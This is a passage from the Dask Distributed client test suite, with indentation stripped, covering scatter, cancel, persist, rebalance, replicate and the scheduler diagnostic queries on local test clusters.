x, y = await c.scatter([1, 2], broadcast=True)
assert a.data == b.data == {x.key: 1, y.key: 2}
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
async def test__broadcast_integer(c, s, *workers):
x, y = await c.scatter([1, 2], broadcast=2)
assert len(s.tasks[x.key].who_has) == 2
assert len(s.tasks[y.key].who_has) == 2
@gen_cluster(client=True)
async def test__broadcast_dict(c, s, a, b):
d = await c.scatter({"x": 1}, broadcast=True)
assert a.data == b.data == {"x": 1}
def test_broadcast(c, s, a, b):
x, y = c.scatter([1, 2], broadcast=True)
has_what = sync(c.loop, c.scheduler.has_what)
assert {k: set(v) for k, v in has_what.items()} == {
a["address"]: {x.key, y.key},
b["address"]: {x.key, y.key},
}
[z] = c.scatter([3], broadcast=True, workers=[a["address"]])
has_what = sync(c.loop, c.scheduler.has_what)
assert {k: set(v) for k, v in has_what.items()} == {
a["address"]: {x.key, y.key, z.key},
b["address"]: {x.key, y.key},
}
@gen_cluster(client=True)
async def test_proxy(c, s, a, b):
msg = await c.scheduler.proxy(msg={"op": "identity"}, worker=a.address)
assert msg["id"] == a.identity()["id"]
@gen_cluster(client=True)
async def test__cancel(c, s, a, b):
x = c.submit(slowinc, 1)
y = c.submit(slowinc, x)
while y.key not in s.tasks:
await asyncio.sleep(0.01)
await c.cancel([x])
assert x.cancelled()
assert "cancel" in str(x)
s.validate_state()
start = time()
while not y.cancelled():
await asyncio.sleep(0.01)
assert time() < start + 5
assert not s.tasks
s.validate_state()
@gen_cluster(client=True)
async def test_cancel_tuple_key(c, s, a, b):
x = c.submit(inc, 1, key=("x", 0, 1))
await x
await c.cancel(x)
with pytest.raises(CancelledError):
await x
@gen_cluster()
async def test_cancel_multi_client(s, a, b):
c = await Client(s.address, asynchronous=True)
f = await Client(s.address, asynchronous=True)
x = c.submit(slowinc, 1)
y = f.submit(slowinc, 1)
assert x.key == y.key
await c.cancel([x])
assert x.cancelled()
assert not y.cancelled()
start = time()
while y.key not in s.tasks:
await asyncio.sleep(0.01)
assert time() < start + 5
out = await y
assert out == 2
with pytest.raises(CancelledError):
await x
await c.close()
await f.close()
@gen_cluster(client=True)
async def test_cancel_collection(c, s, a, b):
L = c.map(double, [[1], [2], [3]])
x = db.Bag({("b", i): f for i, f in enumerate(L)}, "b", 3)
await c.cancel(x)
await c.cancel([x])
assert all(f.cancelled() for f in L)
start = time()
while s.tasks:
assert time() < start + 1
await asyncio.sleep(0.01)
def test_cancel(c):
x = c.submit(slowinc, 1, key="x")
y = c.submit(slowinc, x, key="y")
z = c.submit(slowinc, y, key="z")
c.cancel([y])
start = time()
while not z.cancelled():
sleep(0.01)
assert time() < start + 5
assert x.result() == 2
z.cancel()
assert z.cancelled()
@gen_cluster(client=True)
async def test_future_type(c, s, a, b):
x = c.submit(inc, 1)
await wait([x])
assert x.type == int
assert "int" in str(x)
@gen_cluster(client=True)
async def test_traceback_clean(c, s, a, b):
x = c.submit(div, 1, 0)
try:
await x
except Exception as e:
f = e
exc_type, exc_value, tb = sys.exc_info()
while tb:
assert "scheduler" not in tb.tb_frame.f_code.co_filename
assert "worker" not in tb.tb_frame.f_code.co_filename
tb = tb.tb_next
@gen_cluster(client=True)
async def test_map_different_lengths(c, s, a, b):
assert len(c.map(add, [1, 2], [1, 2, 3])) == 2
def test_Future_exception_sync_2(loop, capsys):
with cluster() as (s, [a, b]):
with Client(s["address"], loop=loop) as c:
assert dask.base.get_scheduler() == c.get
out, err = capsys.readouterr()
assert len(out.strip().split("\n")) == 1
assert dask.base.get_scheduler() != c.get
@gen_cluster(timeout=60, client=True)
async def test_async_persist(c, s, a, b):
from dask.delayed import delayed, Delayed
x = delayed(1)
y = delayed(inc)(x)
z = delayed(dec)(x)
w = delayed(add)(y, z)
yy, ww = c.persist([y, w])
assert type(yy) == type(y)
assert type(ww) == type(w)
assert len(yy.dask) == 1
assert len(ww.dask) == 1
assert len(w.dask) > 1
assert y.__dask_keys__() == yy.__dask_keys__()
assert w.__dask_keys__() == ww.__dask_keys__()
while y.key not in s.tasks and w.key not in s.tasks:
await asyncio.sleep(0.01)
assert s.who_wants[y.key] == {c.id}
assert s.who_wants[w.key] == {c.id}
yyf, wwf = c.compute([yy, ww])
yyy, www = await c.gather([yyf, wwf])
assert yyy == inc(1)
assert www == add(inc(1), dec(1))
assert isinstance(c.persist(y), Delayed)
assert isinstance(c.persist([y]), (list, tuple))
@gen_cluster(client=True)
async def test__persist(c, s, a, b):
pytest.importorskip("dask.array")
import dask.array as da
x = da.ones((10, 10), chunks=(5, 10))
y = 2 * (x + 1)
assert len(y.dask) == 6
yy = c.persist(y)
assert len(y.dask) == 6
assert len(yy.dask) == 2
assert all(isinstance(v, Future) for v in yy.dask.values())
assert yy.__dask_keys__() == y.__dask_keys__()
g, h = c.compute([y, yy])
gg, hh = await c.gather([g, h])
assert (gg == hh).all()
def test_persist(c):
pytest.importorskip("dask.array")
import dask.array as da
x = da.ones((10, 10), chunks=(5, 10))
y = 2 * (x + 1)
assert len(y.dask) == 6
yy = c.persist(y)
assert len(y.dask) == 6
assert len(yy.dask) == 2
assert all(isinstance(v, Future) for v in yy.dask.values())
assert yy.__dask_keys__() == y.__dask_keys__()
zz = yy.compute()
z = y.compute()
assert (zz == z).all()
@gen_cluster(timeout=60, client=True)
async def test_long_traceback(c, s, a, b):
from distributed.protocol.pickle import dumps
def deep(n):
if n == 0:
1 / 0
else:
return deep(n - 1)
x = c.submit(deep, 200)
await wait([x])
assert len(dumps(c.futures[x.key].traceback)) < 10000
assert isinstance(c.futures[x.key].exception, ZeroDivisionError)
@gen_cluster(client=True)
async def test_wait_on_collections(c, s, a, b):
L = c.map(double, [[1], [2], [3]])
x = db.Bag({("b", i): f for i, f in enumerate(L)}, "b", 3)
await wait(x)
assert all(f.key in a.data or f.key in b.data for f in L)
@gen_cluster(client=True)
async def test_futures_of_get(c, s, a, b):
x, y, z = c.map(inc, [1, 2, 3])
assert set(futures_of(0)) == set()
assert set(futures_of(x)) == {x}
assert set(futures_of([x, y, z])) == {x, y, z}
assert set(futures_of([x, [y], [[z]]])) == {x, y, z}
assert set(futures_of({"x": x, "y": [y]})) == {x, y}
b = db.Bag({("b", i): f for i, f in enumerate([x, y, z])}, "b", 3)
assert set(futures_of(b)) == {x, y, z}
sg = SubgraphCallable(
{"x": x, "y": y, "z": z, "out": (add, (add, (add, x, y), z), "in")},
"out",
("in",),
)
assert set(futures_of(sg)) == {x, y, z}
def test_futures_of_class():
da = pytest.importorskip("dask.array")
assert futures_of([da.Array]) == []
@gen_cluster(client=True)
async def test_futures_of_cancelled_raises(c, s, a, b):
x = c.submit(inc, 1)
await c.cancel([x])
with pytest.raises(CancelledError):
await x
with pytest.raises(CancelledError):
await c.get({"x": (inc, x), "y": (inc, 2)}, ["x", "y"], sync=False)
with pytest.raises(CancelledError):
c.submit(inc, x)
with pytest.raises(CancelledError):
c.submit(add, 1, y=x)
with pytest.raises(CancelledError):
c.map(add, [1], y=x)
assert "y" not in s.tasks
@pytest.mark.skip
@gen_cluster(nthreads=[("127.0.0.1", 1)], client=True)
async def test_dont_delete_recomputed_results(c, s, w):
x = c.submit(inc, 1) # compute first time
await wait([x])
x.__del__() # trigger garbage collection
await asyncio.sleep(0)
xx = c.submit(inc, 1) # compute second time
start = time()
while xx.key not in w.data: # data shows up
await asyncio.sleep(0.01)
assert time() < start + 1
while time() < start + (s.delete_interval + 100) / 1000: # and stays
assert xx.key in w.data
await asyncio.sleep(0.01)
@gen_cluster(nthreads=[], client=True)
async def test_fatally_serialized_input(c, s):
o = FatallySerializedObject()
future = c.submit(inc, o)
while not s.tasks:
await asyncio.sleep(0.01)
@pytest.mark.skip(reason="Use fast random selection now")
@gen_cluster(client=True)
async def test_balance_tasks_by_stacks(c, s, a, b):
x = c.submit(inc, 1)
await wait(x)
y = c.submit(inc, 2)
await wait(y)
assert len(a.data) == len(b.data) == 1
@gen_cluster(client=True)
async def test_run(c, s, a, b):
results = await c.run(inc, 1)
assert results == {a.address: 2, b.address: 2}
results = await c.run(inc, 1, workers=[a.address])
assert results == {a.address: 2}
results = await c.run(inc, 1, workers=[])
assert results == {}
@gen_cluster(client=True)
async def test_run_handles_picklable_data(c, s, a, b):
futures = c.map(inc, range(10))
await wait(futures)
def func():
return {}, set(), [], (), 1, "hello", b"100"
results = await c.run_on_scheduler(func)
assert results == func()
results = await c.run(func)
assert results == {w.address: func() for w in [a, b]}
def test_run_sync(c, s, a, b):
def func(x, y=10):
return x + y
result = c.run(func, 1, y=2)
assert result == {a["address"]: 3, b["address"]: 3}
result = c.run(func, 1, y=2, workers=[a["address"]])
assert result == {a["address"]: 3}
@gen_cluster(client=True)
async def test_run_coroutine(c, s, a, b):
results = await c.run(geninc, 1, delay=0.05)
assert results == {a.address: 2, b.address: 2}
results = await c.run(geninc, 1, delay=0.05, workers=[a.address])
assert results == {a.address: 2}
results = await c.run(geninc, 1, workers=[])
assert results == {}
with pytest.raises(RuntimeError, match="hello"):
await c.run(throws, 1)
results = await c.run(asyncinc, 2, delay=0.01)
assert results == {a.address: 3, b.address: 3}
def test_run_coroutine_sync(c, s, a, b):
result = c.run(geninc, 2, delay=0.01)
assert result == {a["address"]: 3, b["address"]: 3}
result = c.run(geninc, 2, workers=[a["address"]])
assert result == {a["address"]: 3}
t1 = time()
result = c.run(geninc, 2, delay=10, wait=False)
t2 = time()
assert result is None
assert t2 - t1 <= 1.0
def test_run_exception(c):
def raise_exception(exc_type, exc_msg):
raise exc_type(exc_msg)
for exc_type in [ValueError, RuntimeError]:
with pytest.raises(exc_type, match="informative message"):
c.run(raise_exception, exc_type, "informative message")
def test_diagnostic_ui(loop):
with cluster() as (s, [a, b]):
a_addr = a["address"]
b_addr = b["address"]
with Client(s["address"], loop=loop) as c:
d = c.nthreads()
assert d == {a_addr: 1, b_addr: 1}
d = c.nthreads([a_addr])
assert d == {a_addr: 1}
d = c.nthreads(a_addr)
assert d == {a_addr: 1}
d = c.nthreads(a["address"])
assert d == {a_addr: 1}
x = c.submit(inc, 1)
y = c.submit(inc, 2)
z = c.submit(inc, 3)
wait([x, y, z])
d = c.who_has()
assert set(d) == {x.key, y.key, z.key}
assert all(w in [a_addr, b_addr] for v in d.values() for w in v)
assert all(d.values())
d = c.who_has([x, y])
assert set(d) == {x.key, y.key}
d = c.who_has(x)
assert set(d) == {x.key}
d = c.has_what()
assert set(d) == {a_addr, b_addr}
assert all(k in [x.key, y.key, z.key] for v in d.values() for k in v)
d = c.has_what([a_addr])
assert set(d) == {a_addr}
d = c.has_what(a_addr)
assert set(d) == {a_addr}
def test_diagnostic_nbytes_sync(c):
incs = c.map(inc, [1, 2, 3])
doubles = c.map(double, [1, 2, 3])
wait(incs + doubles)
assert c.nbytes(summary=False) == {k.key: sizeof(1) for k in incs + doubles}
assert c.nbytes(summary=True) == {"inc": sizeof(1) * 3, "double": sizeof(1) * 3}
@gen_cluster(client=True)
async def test_diagnostic_nbytes(c, s, a, b):
incs = c.map(inc, [1, 2, 3])
doubles = c.map(double, [1, 2, 3])
await wait(incs + doubles)
assert s.get_nbytes(summary=False) == {k.key: sizeof(1) for k in incs + doubles}
assert s.get_nbytes(summary=True) == {"inc": sizeof(1) * 3, "double": sizeof(1) * 3}
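# Workers may be addressed by their ``name`` alias (string or integer) in
# addition to their address when targeting submit/map/scatter calls.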
@gen_test()
async def test_worker_aliases():
s = await Scheduler(validate=True, port=0)
a = Worker(s.address, name="alice")
b = Worker(s.address, name="bob")
w = Worker(s.address, name=3)
await asyncio.gather(a, b, w)
c = await Client(s.address, asynchronous=True)
L = c.map(inc, range(10), workers="alice")
future = await c.scatter(123, workers=3)
await wait(L)
assert len(a.data) == 10
assert len(b.data) == 0
assert dict(w.data) == {future.key: 123}
for i, alias in enumerate([3, [3], "alice"]):
result = await c.submit(lambda x: x + 1, i, workers=alias)
assert result == i + 1
await c.close()
await asyncio.gather(a.close(), b.close(), w.close())
await s.close()
def test_persist_get_sync(c):
dadd = delayed(add)
x, y = delayed(1), delayed(2)
xx = delayed(add)(x, x)
yy = delayed(add)(y, y)
xxyy = delayed(add)(xx, yy)
xxyy2 = c.persist(xxyy)
xxyy3 = delayed(add)(xxyy2, 10)
assert xxyy3.compute() == ((1 + 1) + (2 + 2)) + 10
@gen_cluster(client=True)
async def test_persist_get(c, s, a, b):
dadd = delayed(add)
x, y = delayed(1), delayed(2)
xx = delayed(add)(x, x)
yy = delayed(add)(y, y)
xxyy = delayed(add)(xx, yy)
xxyy2 = c.persist(xxyy)
xxyy3 = delayed(add)(xxyy2, 10)
await asyncio.sleep(0.5)
result = await c.gather(c.get(xxyy3.dask, xxyy3.__dask_keys__(), sync=False))
assert result[0] == ((1 + 1) + (2 + 2)) + 10
result = await c.compute(xxyy3)
assert result == ((1 + 1) + (2 + 2)) + 10
result = await c.compute(xxyy3)
assert result == ((1 + 1) + (2 + 2)) + 10
result = await c.compute(xxyy3)
assert result == ((1 + 1) + (2 + 2)) + 10
@pytest.mark.skipif(WINDOWS, reason="num_fds not supported on windows")
def test_client_num_fds(loop):
psutil = pytest.importorskip("psutil")
with cluster() as (s, [a, b]):
proc = psutil.Process()
with Client(s["address"], loop=loop) as c: # first client to start loop
before = proc.num_fds() # measure
for i in range(4):
with Client(s["address"], loop=loop): # start more clients
pass
start = time()
while proc.num_fds() > before:
sleep(0.01)
assert time() < start + 4
@gen_cluster()
async def test_startup_close_startup(s, a, b):
c = await Client(s.address, asynchronous=True)
await c.close()
c = await Client(s.address, asynchronous=True)
await c.close()
def test_startup_close_startup_sync(loop):
with cluster() as (s, [a, b]):
with Client(s["address"], loop=loop) as c:
sleep(0.1)
with Client(s["address"]) as c:
pass
with Client(s["address"]) as c:
pass
sleep(0.1)
with Client(s["address"]) as c:
pass
@gen_cluster(client=True)
async def test_badly_serialized_exceptions(c, s, a, b):
def f():
class BadlySerializedException(Exception):
def __reduce__(self):
raise TypeError()
raise BadlySerializedException("hello world")
x = c.submit(f)
try:
result = await x
except Exception as e:
assert "hello world" in str(e)
else:
assert False
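# rebalance() should move scattered data so that it ends up spread evenly
# across the workers, while keeping the scheduler's bookkeeping consistent.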
@gen_cluster(client=True)
async def test_rebalance(c, s, a, b):
aws = s.workers[a.address]
bws = s.workers[b.address]
x, y = await c.scatter([1, 2], workers=[a.address])
assert len(a.data) == 2
assert len(b.data) == 0
s.validate_state()
await c.rebalance()
s.validate_state()
assert len(b.data) == 1
assert {ts.key for ts in bws.has_what} == set(b.data)
assert bws in s.tasks[x.key].who_has or bws in s.tasks[y.key].who_has
assert len(a.data) == 1
assert {ts.key for ts in aws.has_what} == set(a.data)
assert aws not in s.tasks[x.key].who_has or aws not in s.tasks[y.key].who_has
@gen_cluster(nthreads=[("127.0.0.1", 1)] * 4, client=True)
async def test_rebalance_workers(e, s, a, b, c, d):
w, x, y, z = await e.scatter([1, 2, 3, 4], workers=[a.address])
assert len(a.data) == 4
assert len(b.data) == 0
assert len(c.data) == 0
assert len(d.data) == 0
await e.rebalance([x, y], workers=[a.address, c.address])
assert len(a.data) == 3
assert len(b.data) == 0
assert len(c.data) == 1
assert len(d.data) == 0
assert c.data == {x.key: 2} or c.data == {y.key: 3}
await e.rebalance()
assert len(a.data) == 1
assert len(b.data) == 1
assert len(c.data) == 1
assert len(d.data) == 1
s.validate_state()
@gen_cluster(client=True)
async def test_rebalance_execution(c, s, a, b):
futures = c.map(inc, range(10), workers=a.address)
await c.rebalance(futures)
assert len(a.data) == len(b.data) == 5
s.validate_state()
def test_rebalance_sync(c, s, a, b):
futures = c.map(inc, range(10), workers=[a["address"]])
c.rebalance(futures)
has_what = c.has_what()
assert len(has_what) == 2
assert list(valmap(len, has_what).values()) == [5, 5]
@gen_cluster(client=True)
async def test_rebalance_unprepared(c, s, a, b):
futures = c.map(slowinc, range(10), delay=0.05, workers=a.address)
await asyncio.sleep(0.1)
await c.rebalance(futures)
s.validate_state()
@gen_cluster(client=True)
async def test_rebalance_raises_missing_data(c, s, a, b):
with pytest.raises(ValueError, match="keys were found to be missing"):
futures = await c.scatter(range(100))
keys = [f.key for f in futures]
del futures
await c.rebalance(keys)
@gen_cluster(client=True)
async def test_receive_lost_key(c, s, a, b):
x = c.submit(inc, 1, workers=[a.address])
await x
await a.close()
start = time()
while x.status == "finished":
assert time() < start + 5
await asyncio.sleep(0.01)
@pytest.mark.skipif(
not sys.platform.startswith("linux"), reason="Need 127.0.0.2 to mean localhost"
)
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_unrunnable_task_runs(c, s, a, b):
x = c.submit(inc, 1, workers=[a.ip])
await x
await a.close()
start = time()
while x.status == "finished":
assert time() < start + 5
await asyncio.sleep(0.01)
assert s.tasks[x.key] in s.unrunnable
assert s.get_task_status(keys=[x.key]) == {x.key: "no-worker"}
w = await Worker(s.address, loop=s.loop)
start = time()
while x.status != "finished":
assert time() < start + 2
await asyncio.sleep(0.01)
assert s.tasks[x.key] not in s.unrunnable
result = await x
assert result == 2
await w.close()
@gen_cluster(client=True, nthreads=[])
async def test_add_worker_after_tasks(c, s):
futures = c.map(inc, range(10))
n = await Nanny(s.address, nthreads=2, loop=s.loop, port=0)
await c.gather(futures)
await n.close()
@pytest.mark.skipif(
not sys.platform.startswith("linux"), reason="Need 127.0.0.2 to mean localhost"
)
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_workers_register_indirect_data(c, s, a, b):
[x] = await c.scatter([1], workers=a.address)
y = c.submit(inc, x, workers=b.ip)
await y
assert b.data[x.key] == 1
assert s.tasks[x.key].who_has == {s.workers[a.address], s.workers[b.address]}
assert s.workers[b.address].has_what == {s.tasks[x.key], s.tasks[y.key]}
s.validate_state()
@gen_cluster(client=True)
async def test_submit_on_cancelled_future(c, s, a, b):
x = c.submit(inc, 1)
await x
await c.cancel(x)
with pytest.raises(CancelledError):
c.submit(inc, x)
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 10)
async def test_replicate(c, s, *workers):
[a, b] = await c.scatter([1, 2])
await s.replicate(keys=[a.key, b.key], n=5)
s.validate_state()
assert len(s.tasks[a.key].who_has) == 5
assert len(s.tasks[b.key].who_has) == 5
assert sum(a.key in w.data for w in workers) == 5
assert sum(b.key in w.data for w in workers) == 5
@gen_cluster(client=True)
async def test_replicate_tuple_keys(c, s, a, b):
x = delayed(inc)(1, dask_key_name=("x", 1))
f = c.persist(x)
await c.replicate(f, n=5)
s.validate_state()
assert a.data and b.data
await c.rebalance(f)
s.validate_state()
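# replicate() restricted to an explicit worker list should only create copies
# on those workers; n=None replicates to every worker.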
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 10)
async def test_replicate_workers(c, s, *workers):
[a, b] = await c.scatter([1, 2], workers=[workers[0].address])
await s.replicate(
keys=[a.key, b.key], n=5, workers=[w.address for w in workers[:5]]
)
assert len(s.tasks[a.key].who_has) == 5
assert len(s.tasks[b.key].who_has) == 5
assert sum(a.key in w.data for w in workers[:5]) == 5
assert sum(b.key in w.data for w in workers[:5]) == 5
assert sum(a.key in w.data for w in workers[5:]) == 0
assert sum(b.key in w.data for w in workers[5:]) == 0
await s.replicate(keys=[a.key, b.key], n=1)
assert len(s.tasks[a.key].who_has) == 1
assert len(s.tasks[b.key].who_has) == 1
assert sum(a.key in w.data for w in workers) == 1
assert sum(b.key in w.data for w in workers) == 1
s.validate_state()
await s.replicate(keys=[a.key, b.key], n=None) # all
assert len(s.tasks[a.key].who_has) == 10
assert len(s.tasks[b.key].who_has) == 10
s.validate_state()
await s.replicate(
keys=[a.key, b.key], n=1, workers=[w.address for w in workers[:5]]
)
assert sum(a.key in w.data for w in workers[:5]) == 1
assert sum(b.key in w.data for w in workers[:5]) == 1
assert sum(a.key in w.data for w in workers[5:]) == 5
assert sum(b.key in w.data for w in workers[5:]) == 5
s.validate_state()
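# CountSerialization increments a counter each time it is deserialized, so
# test_replicate_tree_branching can check that replication branches out in a
# tree (copies made from other copies) rather than sourcing every copy from
# the original holder.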
class CountSerialization:
def __init__(self):
self.n = 0
def __setstate__(self, n):
self.n = n + 1
def __getstate__(self):
return self.n
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 10)
async def test_replicate_tree_branching(c, s, *workers):
obj = CountSerialization()
[future] = await c.scatter([obj])
await s.replicate(keys=[future.key], n=10)
max_count = max(w.data[future.key].n for w in workers)
assert max_count > 1
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 10)
async def test_client_replicate(c, s, *workers):
x = c.submit(inc, 1)
y = c.submit(inc, 2)
await c.replicate([x, y], n=5)
assert len(s.tasks[x.key].who_has) == 5
assert len(s.tasks[y.key].who_has) == 5
await c.replicate([x, y], n=3)
assert len(s.tasks[x.key].who_has) == 3
assert len(s.tasks[y.key].who_has) == 3
await c.replicate([x, y])
s.validate_state()
assert len(s.tasks[x.key].who_has) == 10
assert len(s.tasks[y.key].who_has) == 10
@pytest.mark.skipif(
not sys.platform.startswith("linux"), reason="Need 127.0.0.2 to mean localhost"
)
@gen_cluster(
client=True,
nthreads=[("127.0.0.1", 1), ("127.0.0.2", 1), ("127.0.0.2", 1)],
timeout=None,
)
async def test_client_replicate_host(client, s, a, b, c):
aws = s.workers[a.address]
bws = s.workers[b.address]
cws = s.workers[c.address]
x = client.submit(inc, 1, workers="127.0.0.2")
await wait([x])
assert s.tasks[x.key].who_has == {bws} or s.tasks[x.key].who_has == {cws}
await client.replicate([x], workers=["127.0.0.2"])
assert s.tasks[x.key].who_has == {bws, cws}
await client.replicate([x], workers=["127.0.0.1"])
assert s.tasks[x.key].who_has == {aws, bws, cws}
def test_client_replicate_sync(c):
x = c.submit(inc, 1)
y = c.submit(inc, 2)
c.replicate([x, y], n=2)
who_has = c.who_has()
assert len(who_has[x.key]) == len(who_has[y.key]) == 2
with pytest.raises(ValueError):
c.replicate([x], n=0)
assert y.result() == 3
@pytest.mark.skipif(WINDOWS, reason="Windows timer too coarse-grained")
@gen_cluster(client=True, nthreads=[("127.0.0.1", 4)] * 1)
async def test_task_load_adapts_quickly(c, s, a):
future = c.submit(slowinc, 1, delay=0.2) # slow
await wait(future)
assert 0.15 < s.task_prefixes["slowinc"].duration_average < 0.4
futures = c.map(slowinc, range(10), delay=0) # very fast
await wait(futures)
assert 0 < s.task_prefixes["slowinc"].duration_average < 0.1
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 2)
async def test_even_load_after_fast_functions(c, s, a, b):
x = c.submit(inc, 1, workers=a.address) # very fast
y = c.submit(inc, 2, workers=b.address) # very fast
await wait([x, y])
futures = c.map(inc, range(2, 11))
await wait(futures)
assert any(f.key in a.data for f in futures)
assert any(f.key in b.data for f in futures)
# assert abs(len(a.data) - len(b.data)) <= 3
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 2)
async def test_even_load_on_startup(c, s, a, b):
x, y = c.map(inc, [1, 2])
await wait([x, y])
assert len(a.data) == len(b.data) == 1
@pytest.mark.skip
@gen_cluster(client=True, nthreads=[("127.0.0.1", 2)] * 2)
async def test_contiguous_load(c, s, a, b):
w, x, y, z = c.map(inc, [1, 2, 3, 4])
await wait([w, x, y, z])
groups = [set(a.data), set(b.data)]
assert {w.key, x.key} in groups
assert {y.key, z.key} in groups
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
async def test_balanced_with_submit(c, s, *workers):
L = [c.submit(slowinc, i) for i in range(4)]
await wait(L)
for w in workers:
assert len(w.data) == 1
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
async def test_balanced_with_submit_and_resident_data(c, s, *workers):
[x] = await c.scatter([10], broadcast=True)
L = [c.submit(slowinc, x, pure=False) for i in range(4)]
await wait(L)
for w in workers:
assert len(w.data) == 2
@gen_cluster(client=True, nthreads=[("127.0.0.1", 20)] * 2)
async def test_scheduler_saturates_cores(c, s, a, b):
for delay in [0, 0.01, 0.1]:
futures = c.map(slowinc, range(100), delay=delay)
futures = c.map(slowinc, futures, delay=delay / 10)
while not s.tasks:
if s.tasks:
assert all(
len(p) >= 20
for w in s.workers.values()
for p in w.processing.values()
)
await asyncio.sleep(0.01)
@gen_cluster(client=True, nthreads=[("127.0.0.1", 20)] * 2)
async def test_scheduler_saturates_cores_random(c, s, a, b):
for delay in [0, 0.01, 0.1]:
futures = c.map(randominc, range(100), scale=0.1)
while not s.tasks:
if s.tasks:
assert all(
len(p) >= 20
for w in s.workers.values()
for p in w.processing.values()
)
await asyncio.sleep(0.01)
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
async def test_cancel_clears_processing(c, s, *workers):
da = pytest.importorskip("dask.array")
x = c.submit(slowinc, 1, delay=0.2)
while not s.tasks:
await asyncio.sleep(0.01)
await c.cancel(x)
start = time()
while any(v for w in s.workers.values() for v in w.processing):
assert time() < start + 0.2
await asyncio.sleep(0.01)
s.validate_state()
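# A client created with set_as_default=True should install itself as dask's
# global scheduler and restore the previous default when it closes.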
def test_default_get():
with cluster() as (s, [a, b]):
pre_get = dask.base.get_scheduler()
pytest.raises(KeyError, dask.config.get, "shuffle")
with Client(s["address"], set_as_default=True) as c:
assert dask.base.get_scheduler() == c.get
assert dask.config.get("shuffle") == "tasks"
assert dask.base.get_scheduler() == pre_get
pytest.raises(KeyError, dask.config.get, "shuffle")
c = Client(s["address"], set_as_default=False)
assert dask.base.get_scheduler() == pre_get
pytest.raises(KeyError, dask.config.get, "shuffle")
c.close()
c = Client(s["address"], set_as_default=True)
assert dask.config.get("shuffle") == "tasks"
assert dask.base.get_scheduler() == c.get
c.close()
assert dask.base.get_scheduler() == pre_get
pytest.raises(KeyError, dask.config.get, "shuffle")
with Client(s["address"]) as c:
assert dask.base.get_scheduler() == c.get
with Client(s["address"], set_as_default=False) as c:
assert dask.base.get_scheduler() != c.get
assert dask.base.get_scheduler() != c.get
with Client(s["address"], set_as_default=True) as c1:
assert dask.base.get_scheduler() == c1.get
with Client(s["address"], set_as_default=True) as c2:
assert dask.base.get_scheduler() == c2.get
assert dask.base.get_scheduler() == c1.get
assert dask.base.get_scheduler() == pre_get
@gen_cluster(client=True)
async def test_get_processing(c, s, a, b):
processing = await c.processing()
assert processing == valmap(tuple, s.processing)
futures = c.map(
slowinc, range(10), delay=0.1, workers=[a.address], allow_other_workers=True
)
await asyncio.sleep(0.2)
x = await c.processing()
assert set(x) == {a.address, b.address}
x = await c.processing(workers=[a.address])
assert isinstance(x[a.address], (list, tuple))
@gen_cluster(client=True)
async def test_get_foo(c, s, a, b):
futures = c.map(inc, range(10))
await wait(futures)
x = await c.scheduler.ncores()
assert x == s.nthreads
x = await c.scheduler.ncores(workers=[a.address])
assert x == {a.address: s.nthreads[a.address]}
x = await c.scheduler.has_what()
assert valmap(sorted, x) == valmap(sorted, s.has_what)
x = await c.scheduler.has_what(workers=[a.address])
assert valmap(sorted, x) == {a.address: sorted(s.has_what[a.address])}
x = await c.scheduler.nbytes(summary=False)
assert x == s.get_nbytes(summary=False)
x = await c.scheduler.nbytes(keys=[futures[0].key], summary=False)
assert x == {futures[0].key: s.tasks[futures[0].key].nbytes}
x = await c.scheduler.who_has()
assert valmap(sorted, x) == valmap(sorted, s.who_has)
x = await c.scheduler.who_has(keys=[futures[0].key])
assert valmap(sorted, x) == {futures[0].key: sorted(s.who_has[futures[0].key])}
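# Helper: assert two mappings have the same keys and that each pair of values
# compares equal element-wise, order included.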
def assert_dict_key_equal(expected, actual):
assert set(expected.keys()) == set(actual.keys())
for k in actual.keys():
ev = expected[k]
av = actual[k]
assert list(ev) == list(av)
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 3)
async def test_get_foo_lost_keys(c, s, u, v, w):
x = c.submit(inc, 1, workers=[u.address])
y = await c.scatter(3, workers=[v.address])
await wait([x, y])
ua, va, wa = u.address, v.address, w.address
d = await c.scheduler.has_what()
assert_dict_key_equal(d, {ua: [x.key], va: [y.key], wa: []})
d = await c.scheduler.has_what(workers=[ua, va])
assert_dict_key_equal(d, {ua: [x.key], va: [y.key]})
d = await c.scheduler.who_has()
assert_dict_key_equal(d, {x.key: [ua], y.key: [va]})
d = await c.scheduler.who_has(keys=[x.key, y.key])
assert_dict_key_equal(d, {x.key: [ua], y.key: [va]})
await u.close()
await v.close()
d = await c.scheduler.has_what()
assert_dict_key_equal(d, {wa: []})
d = await c.scheduler.has_what(workers=[ua, va])
assert_dict_key_equal(d, {ua: [], va: []})
# The scattered key cannot be recomputed so it is forgotten
d = await c.scheduler.who_has()
assert_dict_key_equal(d, {x.key: []})
# ... but when passed explicitly, it is included in the result
d = await c.scheduler.who_has(keys=[x.key, y.key])
assert_dict_key_equal(d, {x.key: [], y.key: []})
@pytest.mark.slow
@gen_cluster(
client=True, Worker=Nanny, clean_kwargs={"threads": False, "processes": False}
)
async def test_bad_tasks_fail(c, s, a, b):
f = c.submit(sys.exit, 0)
with pytest.raises(KilledWorker) as info:
await f
assert info.value.last_worker.nanny in {a.address, b.address}
await asyncio.gather(a.close(), b.close())
def test_get_processing_sync(c, s, a, b):
processing = c.processing()
assert not any(v for v in processing.values())
futures = c.map(
slowinc, range(10), delay=0.1, workers=[a["address"]], allow_other_workers=False
)
sleep(0.2)
aa = a["address"]
bb = b["address"]
processing = c.processing()
assert set(c.processing(aa)) == {aa}
assert set(c.processing([aa])) == {aa}
c.cancel(futures)
def test_close_idempotent(c):
c.close()
c.close()
c.close()
@nodebug
def test_get_returns_early(c):
start = time()
with suppress(RuntimeError):
result = c.get({"x": (throws, 1), "y": (sleep, 1)}, ["x", "y"])
assert time() < start + 0.5
# Futures should be released and forgotten
wait_for(lambda: not c.futures, timeout=0.1)
